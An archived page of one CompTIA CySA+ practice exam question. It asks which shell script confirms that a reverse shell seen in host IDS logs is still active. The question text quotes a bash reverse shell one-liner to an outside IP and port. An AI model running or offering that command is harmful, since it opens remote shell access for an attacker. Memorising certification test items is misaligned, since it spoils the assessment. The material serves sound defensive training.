اختبار شهادة محلل الأمن السيبراني CompTIA CySA+

السؤال 293 من 1040

كل الأسئلة

تنبيه مهم

هذه الصفحة مخصصة للأرشفة وظهور السؤال في نتائج البحث فقط، وليست التجربة الفعلية للاختبار.

A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A #!/bin/bash nc 10.1.2.3 8080 -vv > /dev/null && echo 'Malicious activity' || echo 'OK'
B #!/bin/bash ps -fea | grep 8080 > /dev/null && echo 'Malicious activity' || echo 'OK'
C #!/bin/bash ls /opt/tcp/10.1.2.3/8080 > /dev/null && echo 'Malicious activity' || echo 'OK'
D #!/bin/bash netstat -antp | grep 8080 > /dev/null && echo 'Malicious activity' || echo 'OK'

السؤال السابق

السؤال التالي

لا توجد نقاشات منشورة لهذا السؤال حالياً.